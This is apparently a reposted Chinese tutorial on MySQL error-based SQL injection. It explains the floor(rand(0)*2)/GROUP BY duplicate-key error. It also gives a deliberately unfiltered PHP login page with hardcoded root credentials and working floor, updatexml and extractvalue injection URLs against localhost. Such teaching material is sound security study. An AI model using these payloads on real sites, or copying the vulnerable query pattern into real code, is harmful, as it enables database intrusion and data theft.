SQL注入——报错注入
0x00 背景
SQL注入长期位于OWASP TOP10 榜首,对Web 安全有着很大的影响,黑客们往往在注入过程中根据错误回显进行判断,但是现在非常多的Web程序没有正常的错误回显,这样就需要我们利用报错注入的方式来进行SQL注入了。这篇文章会讲解一下报错注入的产生原理和利用案例。
0x01 十种报错注入
这十种方式在这里不多讲了,详情移步https://www.cnblogs.com/wocalieshenmegui/p/5917967.html。平时我们最常用到的三种报错注入方式分别是:floor()、updatexml()、extractvalue()。
0x02 报错注入的原理
为了弄清报错注入的原理,首先先创建了一个名为sqli的数据库,然后建表插入数据:
mysql> create database sqli;
mysql> create table user (id int(11) not null auto_increment primary key,name varchar(20) not null,pass varchar(32) not null);mysql> insert into user (name, pass) values ('admin', md5('admin')), ('guest', md5('guest')); 
我们先看一个基于floor()的报错SQL语句:
select count(*),(concat(floor(rand(0)*2),(select version())))x from user group by x;
如果是第一次接触报错注入的话,一般会有这么几个问题。
Q1.floor()函数是什么?
A1.floor函数的作用是返回小于等于该值的最大整数,也可以理解为向下取整,只保留整数部分。
Q2.rand(0)是什么意思?
A2.rand()函数可以用来生成0或1,但是rand(0)和rand()还是有本质区别的,rand(0)相当于给rand()函数传递了一个参数,然后rand()函数会根据0这个参数进行随机数成成。rand()生成的数字是完全随机的,而rand(0)是有规律的生成,我们可以在数据库中尝试一下。首先测试rand()
我们再测试一下rand(0)的效果
很显然rand(0)是伪随机的,有规律可循,这也是我们采用rand(0)进行报错注入的原因,rand(0)是稳定的,这样每次注入都会报错,而rand()则需要碰运气了,我们测试结果如下
Q3.为什么会出现报错?
A3.我们看一下报错的内容:Duplicate entry '15.5.53' for key 'group_key'。意思是说group_key条目重复。我们使用group by进行分组查询的时候,数据库会生成一张虚拟表
在这张虚拟表中,group by后面的字段作为主键,所以这张表中主键是name,这样我们就基本弄清报错的原因了,其原因主要是因为虚拟表的主键重复。按照MySQL的官方说法,group by要进行两次运算,第一次是拿group by后面的字段值到虚拟表中去对比前,首先获取group by后面的值;第二次是假设group by后面的字段的值在虚拟表中不存在,那就需要把它插入到虚拟表中,这里在插入时会进行第二次运算,由于rand函数存在一定的随机性,所以第二次运算的结果可能与第一次运算的结果不一致,但是这个运算的结果可能在虚拟表中已经存在了,那么这时的插入必然导致主键的重复,进而引发错误。
0x03 案例
//以下案例代码是抄的
数据库可以继续使用之前的数据库,我们在Web根目录下建立sqli.php
1 <?php
2 $conn = mysql_connect("localhost", "root", "123456"); // 连接数据库,账号root,密码root
3 if (!$conn) {
4 die("Connection failed: " . mysql_error());
5 }
6
7 mysql_select_db("sqli", $conn);
8
9 // verify login info
10 if (isset($_GET['name']) && isset($_GET['pass'])) {
11 $name = $_GET['name'];
12 $pass = md5($_GET['pass']);
13
14 $query = "select * from user where name='$name' and pass='$pass'";
15
16 if ($result = mysql_query($query, $conn)) {
17 $row = mysql_fetch_array($result, MYSQL_ASSOC);
18
19 if ($row) {
20 echo "<script>alert('login successful!');</script>";
21 }
22 } else {
23 die("Operation error: " . mysql_error());
24 }
25 }
26
27 mysql_close();
28 ?>
29
30 <!DOCTYPE html>
31 <html>
32 <head>
33 <title>Login</title>
34 </head>
35 <body>
36 <center>
37 <form method="get" action="">
38 <label>Username:</label><input type="text" name="name" value=""/><br/>
39 <label>Password:</label><input type="password" name="pass" value=""/><br/>
40 <input type="submit" value="login"/>
41 </form>
42 </center>
43 </body>
44 </html>在代码的11-14行是登陆验证模块,可以看到程序以GET形式获取了name和pass参数,没有经过任何过滤直接带入了查询语句,这里明显的存在SQL注入漏洞,我们用floor()报错注入进行尝试。
http://localhost/sqli.php?name=' or (select 1 from(select count(*),concat(user(),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a) # &pass=123
我们再分别用updatexml()和extractvalue()分别进行尝试(原理各不相同,但是思路均是认为构造数据库的错误)
http://localhost/sqli.php?name=' or extractvalue(1,concat(user(),0x7e,version())) # &pass=1 http://localhost/index.php?name=' or updatexml(1,concat(user(),0x7e,version()),1) # &pass=1
转载于:https://www.cnblogs.com/richardlee97/p/10617115.html
SQL注入——报错注入相关推荐
- SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https ...
- SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注
第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...
- SQLi LABS Less-26 联合注入+报错注入+布尔盲注+时间盲注
第26关是单引号字符型注入: 后台过滤了关键字( and or ),注释(/* # -- /),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 目录 一.功能分析 二 ...
- SQLi LABS Less 25 联合注入+报错注入+布尔盲注
第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...
- SQL注入-报错注入
目录 一.报错注入的定义 二.利用报错注入的前提 三.报错注入的优缺点 四.构造报错注入的基本步骤 五.常见的报错注入函数 六.报错注入演示(只演示前三个) 1.利用floor()函数进行报错注入 ( ...
- SQLi LABS Less 23 联合注入+报错注入+布尔盲注
第23关是单引号字符型注入: 过滤了注释,使用闭合引号来绕过: 这篇文章提供联合注入.报错注入.布尔盲注三种解题方式. 一.功能分析 这一关是一个简单的查询功能,在地址栏输入id,后台根据id查询数据 ...
- mysql dba盲注_MSSQL手工注入 报错注入方法
例子:www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 [1]首先爆版本:http://www.kfgtfcj.gov.cn/lzygg/Zixun_show ...
- SQLi LABS Less-11 联合注入+报错注入
第十一关是单引号字符型注入,推荐使用联合注入.报错注入 方式一:联合注入 参考文章:联合注入使用详解 原理+步骤+实战教程 第一步.判断注入类型 用户名输入: a' or 1 -- a 密码随便输入: ...
- SQLi LABS Less-12 联合注入+报错注入
第十二关是双引号+括号的字符型注入 , 推荐使用联合注入.报错注入. 方式一:联合注入 参考文章:联合注入使用详解 原理+步骤+实战教程 第一步.判断注入类型 用户名输入:a") or 1 ...
最新文章
- 惠普计算机电源怎么设置充电,惠普电脑怎么用外接电源时不用电池怎样设置的...
- 第十八章 20结构体与string
- 深入浅出 Java 中 JVM 内存管理
- 【LeetCode笔记】148. 排序链表(Java、归并排序、快慢指针、双重递归)
- 用 Mars Remote API 轻松分布式执行 Python 函数
- python基础(13)之数组
- 自下而上、从右往左层次遍历
- 细数SkyEye异构仿真的5大特色
- Vue - 条件渲染与列表渲染
- Sybase:数据类型(对比sqlserver)
- JavaWeb项目开发案例精粹-第6章报价管理系统-001需求分析及设计
- 中南大学 10科学计算和 MATLAB 语言 矩阵变换
- JSP的九大内置对象
- MacBook M1安装Git与Git可视化工具---kalrry
- IDEA debug提示Connected to the target VM, address: ‘127.0.0.1:xxxxx‘, transport: ‘socket‘的原因
- 拉钩网前端项目实战05
- 大一计算机专业学期计划范文,【大一学习计划22篇】_大一学习计划范文大全_2021年大一学习计划_东城教研...
- 华为手机开启开发者模式
- uni.showModal,uni.showToast使用
- np.zeros()生成3维